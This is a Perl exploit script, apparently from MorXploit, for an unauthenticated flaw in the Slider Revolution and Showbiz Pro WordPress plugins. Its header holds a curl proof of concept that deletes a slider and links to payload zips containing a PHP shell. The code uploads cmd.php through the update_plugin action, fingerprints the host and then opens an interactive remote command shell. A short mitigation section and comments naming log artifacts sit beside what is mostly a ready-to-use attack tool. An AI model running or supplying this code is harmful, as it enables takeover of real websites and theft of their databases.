#!/usr/bin/perl
|
|
#
|
|
# Title: Slider Revolution/Showbiz Pro shell upload exploit
|
|
# Author: Simo Ben youssef
|
|
# Contact: Simo_at_Morxploit_com
|
|
# Discovered: 15 October 2014
|
|
# Coded: 15 October 2014
|
|
# Updated: 25 November 2014
|
|
# Published: 25 November 2014
|
|
# MorXploit Research
|
|
# http://www.MorXploit.com
|
|
# Vendor: ThemePunch
|
|
# Vendor url: http://themepunch.com
|
|
# Software: Revslider/Showbiz Pro
|
|
# Versions: <= 3.0.95 (Revslider) / <= 1.7.1 (Showbiz Pro)
|
|
# Products url:
|
|
# http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
|
|
# http://codecanyon.net/item/showbiz-pro-responsive-teaser-wordpress-plugin/4720988
|
|
# Vulnerable scripts:
|
|
# revslider/revslider_admin.php
|
|
# showbiz/showbiz_admin.php
|
|
#
|
|
# About the plugins:
|
|
# The #1 Slider plugin, used by millions, slider revolution is an all-purpose slide displaying solution that allows for showing almost any
|
|
# kind of content with highly customizable transitions, effects and custom animations.
|
|
# Showbiz Pro is a responsive teaser displaying solution that allows you to show WordPress Posts or any Custom Content with a set
|
|
# amount of teaser items.
|
|
#
|
|
# Description:
|
|
# Slider Revolution and Showbiz Pro fail to check authentication in revslider_admin.php/showbiz_admin.php allowing an unauthenticated
|
|
# attacker to abuse administrative features.
|
|
# Some of the features include:
|
|
# Creating/Deleting/Updating sliders
|
|
# Importing/exporting sliders
|
|
# Updating the plugin
|
|
# For a full list of functions please see revslider_admin.php/showbiz_admin.php
|
|
#
|
|
# PoC on revslider:
|
|
# 1- Deleting a slider:
|
|
# root@host:/home/rootuser# curl -v --data "action=revslider_ajax_action&client_action=delete_slider&data[sliderid]=1"
|
|
# http://****.com/wp-admin/admin-ajax.php
|
|
# * Connected to ****.com (**.**.**.**) port 80 (#0)
|
|
# > POST /wp-admin/admin-ajax.php HTTP/1.1
|
|
# > User-Agent: curl/7.35.0
|
|
# > Host: ****.com
|
|
# > Accept: */*
|
|
# > Content-Length: 73
|
|
# > Content-Type: application/x-www-form-urlencoded
|
|
# >
|
|
# * upload completely sent off: 73 out of 73 bytes
|
|
# < HTTP/1.1 200 OK
|
|
# < Date: Fri, 24 Oct 2014 23:25:07 GMT
|
|
# * Server Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 is not blacklisted
|
|
# < Server: Apache/2.4.6 (Unix) OpenSSL/1.0.0-fips mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
|
|
# < X-Powered-By: PHP/5.4.18
|
|
# < X-Robots-Tag: noindex
|
|
# < X-Content-Type-Options: nosniff
|
|
# < Expires: Wed, 11 Jan 1984 05:00:00 GMT
|
|
# < Cache-Control: no-cache, must-revalidate, max-age=0
|
|
# < Pragma: no-cache
|
|
# < X-Frame-Options: SAMEORIGIN
|
|
# < Set-Cookie: PHPSESSID=a23ex1c8a573f1d1xd28c301793ba022c; path=/
|
|
# < Transfer-Encoding: chunked
|
|
# < Content-Type: text/html; charset=UTF-8
|
|
# <
|
|
# * Connection #0 to host http://****.com left intact
|
|
#
|
|
# {"success":true,"message":"The slider deleted","is_redirect":true,"redirect_url":"http:\/\/****.com\/wp-admin\/admin.php?page=revslider&view=sliders"}
|
|
#
|
|
# 2- Uploading a web shell:
|
|
# The following Perl exploit will try to upload a PHP web shell through the update_plugin function
|
|
# To use the exploit, make sure you first download the revslider.zip and showbiz.zip files, which contain cmd.php,
|
|
# http://www.morxploit.com/morxploits/revslider.zip
|
|
# http://www.morxploit.com/morxploits/showbiz.zip
|
|
# and save them in the same directory as the exploit.
|
|
#
|
|
# Demo:
|
|
# perl morxrev.pl http://localhost revslider
|
|
# ===================================================
|
|
# --- Revslider/Showbiz shell upload exploit
|
|
# --- By: Simo Ben youssef <simo_at_morxploit_com>
|
|
# --- MorXploit Research www.MorXploit.com
|
|
# ===================================================
|
|
# [*] Target set to revslider
|
|
# [*] MorXploiting http://localhost
|
|
# [*] Sent payload
|
|
# [+] Payload successfully executed
|
|
# [*] Checking if shell was uploaded
|
|
# [+] Shell successfully uploaded
|
|
#
|
|
# Linux MorXploit 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:30:00 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
|
|
# uid=33(www-data) gid=33(www-data) groups=33(www-data)
|
|
#
|
|
# www-data@MorXploit:~$
|
|
#
|
|
# Download:
|
|
# Exploit:
|
|
# http://www.morxploit.com/morxploits/morxrevbiz.pl
|
|
# Exploit update zip files:
|
|
# http://www.morxploit.com/morxploits/revslider.zip
|
|
# http://www.morxploit.com/morxploits/showbiz.zip
|
|
#
|
|
# Requires LWP::UserAgent
|
|
# apt-get install libwww-perl
|
|
# yum install libwww-perl
|
|
# perl -MCPAN -e 'install Bundle::LWP'
|
|
# For SSL support:
|
|
# apt-get install liblwp-protocol-https-perl
|
|
# yum install perl-Crypt-SSLeay
|
|
#
|
|
# Mitigation:
|
|
# Besides the LFI vulnerability that was published a couple of months ago, this is another vulnerability that the revslider developers have
|
|
# decided to patch without releasing a full security advisory, leaving thousands of revslider users who didn't update their plugin to the
|
|
# latest version (>= 3.0.96) vulnerable to this nasty flaw. Revslider's developers will argue that their slider comes with an
|
|
# auto-update feature, but the problem is that this plugin is bundled with a lot of themes, which means that those themes' users may not get
|
|
# plugin updates or will have to pay to get the update. In other words, revslider developers believe that every user should have the
|
|
# auto-update feature on, otherwise ... you are screwed.
|
|
# Obviously this is way more critical than the LFI vulnerability because it allows shell access giving attackers access to the target system
|
|
# as well as the ability to dump the entire wordpress database locally.
|
|
# That being said, upgrade immediately to the latest version or disable/switch to another plugin.
|
|
# As for Showbiz Pro, sadly the vulnerability has never been patched: we successfully exploited it in the latest version (1.7.1).
|
|
#
|
|
# Author disclaimer:
|
|
# The information contained in this entire document is for educational, demonstration and testing purposes only.
|
|
# Author cannot be held responsible for any malicious use or damage. Use at your own risk.
|
|
#
|
|
# Got comments or questions?
|
|
# Simo_at_MorXploit_dot_com
|
|
#
|
|
# Did you like this exploit?
|
|
# Feel free to buy me a beer =)
|
|
# My btc address: 1Ko12CUAFoWn8syrvg4aQokFedNiwD6d7u
|
|
# Cheers!
|
|
|
|
use LWP::UserAgent;
|
|
use MIME::Base64;
|
|
use strict;
|
|
|
|
sub banner {
    # Clear the terminal (Windows uses `cls`, everything else `clear`),
    # then print the fixed banner lines. No arguments, no return value.
    my $clear_cmd = ($^O eq 'MSWin32') ? 'cls' : 'clear';
    system($clear_cmd);

    my @banner_lines = (
        '===================================================',
        '--- Revslider/Showbiz shell upload exploit',
        '--- By: Simo Ben youssef <simo_at_morxploit_com>',
        '--- MorXploit Research www.MorXploit.com',
        '===================================================',
    );
    print "$_\n" for @banner_lines;
}
|
|
|
|
# Usage check. `defined` is applied to the result of `$ARGV[0] && $ARGV[1]`,
# not to each argument separately: a missing argument makes the `&&` yield
# undef and shows the usage text, but `&&` short-circuits to $ARGV[0] when
# that value is defined-but-false (e.g. "0"), in which case a missing second
# argument is not caught here.
if (!defined ($ARGV[0] && $ARGV[1])) {
banner();
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
|
|
|
|
# Local archives; one of them is sent as the `update_file` part of the
# update_plugin request further down.
my $zip1 = "revslider.zip";
my $zip2 = "showbiz.zip";

# `$zip1 && $zip2` evaluates to "showbiz.zip" (both strings are true), so
# `-e` only tests $zip2. A missing $zip1 is not detected by this check.
unless (-e ($zip1 && $zip2))
{
banner();
print "[-] $zip1 or $zip2 not found! RTFM\n";
exit;
}
|
|
|
|
my $host = $ARGV[0];    # base URL of the WordPress site, e.g. http://localhost
my $plugin = $ARGV[1];  # "revslider" or "showbiz"; selects the AJAX action and the archive
my $action;             # value of the admin-ajax `action` parameter for the chosen plugin
my $update_file;        # local archive sent as the `update_file` upload

# Map the plugin name to its admin-ajax action and to the archive to upload;
# any other name prints the usage text and exits.
if ($plugin eq "revslider") {
$action = "revslider_ajax_action";
$update_file = "$zip1";
}
elsif ($plugin eq "showbiz") {
$action = "showbiz_ajax_action";
$update_file = "$zip2";
}
else {
banner();
print "[-] Wrong plugin name\n";
print "perl $0 <target> <plugin>\n";
print "perl $0 http://localhost revslider\n";
print "perl $0 http://localhost showbiz\n";
exit;
}
# Endpoint every request below goes through, relative to $host.
my $target = "wp-admin/admin-ajax.php";
# Where the script later expects the unpacked archive's cmd.php to be
# reachable. For anyone checking a site for this abuse, the
# temp/update_extract/<plugin>/ directory under the plugin is the on-disk
# artifact to look for.
my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php";
|
|
|
|
sub randomagent {
    # Return one of a fixed set of desktop-browser User-Agent strings,
    # chosen uniformly at random. Takes no arguments.
    my @agents = (
        'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31',
    );
    my $index = int rand scalar @agents;
    return $agents[$index];
}
|
|
my $useragent = randomagent();

# verify_hostname => 0 turns off TLS certificate hostname verification, so
# https targets are accepted with any certificate.
my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
$ua->timeout(10);
$ua->agent($useragent);
# Reachability check: a plain GET of admin-ajax.php must succeed before
# anything else is sent. (`my $status` is declared again further down in
# this same file scope; under `use warnings` that is reported as masking an
# earlier declaration. No `use warnings` here, so it is silent.)
my $status = $ua->get("$host/$target");
unless ($status->is_success) {
banner();
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

banner();
print "[*] Target set to $plugin\n";
print "[*] MorXploiting $host\n";

# The one request the rest of the script depends on: an unauthenticated
# POST to admin-ajax.php with client_action=update_plugin. Content_Type
# "form-data" makes LWP build a multipart body, and the array-ref value of
# update_file is LWP's file-upload form, so the archive is sent as a file
# part. Cookie is deliberately empty: no session is involved, which is
# exactly the missing-authentication issue described in the header.
my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);

print "[*] Sent payload\n";

# The outcome is inferred purely from strings in the response body:
#  - "Wrong update extracted folder" is the reply the script treats as the
#    archive having been unpacked;
#  - "Wrong request" is treated as a patched plugin;
#  - a body ending in "0" is treated as the action not being registered
#    (presumably admin-ajax.php's default reply for an unknown action --
#    inferred, not visible here).
if ($exploit->decoded_content =~ /Wrong update extracted folder/) {
print "[+] Payload successfully executed\n";
}

elsif ($exploit->decoded_content =~ /Wrong request/) {
print "[-] Payload failed: Not vulnerable\n";
exit;
}

elsif ($exploit->decoded_content =~ m/0$/) {
print "[-] Payload failed: Plugin unavailable\n";
exit;
}

else {
# Any other body: try to pull an error message out of the HTML. The match
# result is not checked; the matches above have no capture groups, so when
# this one fails $1 stays undef and the `unless (defined $1)` print dumps
# the whole body instead.
$exploit->decoded_content =~ /<\/b>(.*?)<br>/;
print "[-] Payload failed:$1\n";
print "[-] " . $exploit->decoded_content unless (defined $1);
print "\n";
exit;
}

print "[*] Checking if shell was uploaded\n";
|
|
|
|
sub rndstr {
    # Build a random string. First argument is the length; the remaining
    # arguments are the symbols to draw from (with replacement).
    my $length   = shift;
    my @alphabet = @_;
    my @picks    = map { $alphabet[ rand @alphabet ] } 1 .. $length;
    return join '', @picks;
}
|
|
# Probe: ask the uploaded cmd.php to echo a random 8-character token and
# look for that token in the reply, which separates a working cmd.php from
# an unrelated 200 page. Every command in this section travels
# base64-encoded in the `cmd` query parameter of the temp/update_extract
# path; that request shape is what this activity looks like in a web-server
# access log. The token is alphanumeric only, so interpolating it into the
# regexes below is safe.
my $rndstr = rndstr(8, 1..9, 'a'..'z');
my $cmd1 = encode_base64("echo $rndstr");
# Second `my $status` in this file scope (the first is the reachability
# check above); see the note there.
my $status = $ua->get("$host/$shell?cmd=$cmd1");

if ($status->decoded_content =~ /system\(\) has been disabled/) {
print "[-] Xploit failed: system() has been disabled\n";
exit;
}

elsif ($status->decoded_content !~ /$rndstr/) {
print "[-] Xploit failed: " . $status->status_line . "\n";
exit;
}

# This branch is the negation of the one just above, so it is always taken
# when reached; it only exists to print the success line.
elsif ($status->decoded_content =~ /$rndstr/) {
print "[+] Shell successfully uploaded\n";
}
# Fingerprint the host with a few fixed commands. `uname -a` and `id`
# output is printed as-is; whoami and `uname -n` feed the prompt below.
my $cmd2 = encode_base64("whoami");
my $whoami = $ua->get("$host/$shell?cmd=$cmd2");
my $cmd3 = encode_base64("uname -n");
my $uname = $ua->get("$host/$shell?cmd=$cmd3");
my $cmd4 = encode_base64("id");
my $id = $ua->get("$host/$shell?cmd=$cmd4");
my $cmd5 = encode_base64("uname -a");
my $unamea = $ua->get("$host/$shell?cmd=$cmd5");
print $unamea->decoded_content;
print $id->decoded_content;
my $wa = $whoami->decoded_content;
my $un = $uname->decoded_content;
chomp($wa);
chomp($un);

# Interactive loop: each line typed is base64-encoded and sent as `cmd`, and
# the response body is printed verbatim. Only the literal "exit" ends the
# loop; EOF on STDIN leaves $cmd undef, which is encoded as an empty command
# and the loop keeps going.
while () {
print "\n$wa\@$un:~\$ ";
chomp(my $cmd=<STDIN>);
if ($cmd eq "exit")
{
print "Aurevoir!\n";
exit;
}
my $ucmd = encode_base64("$cmd");
my $output = $ua->get("$host/$shell?cmd=$ucmd");
print $output->decoded_content;
}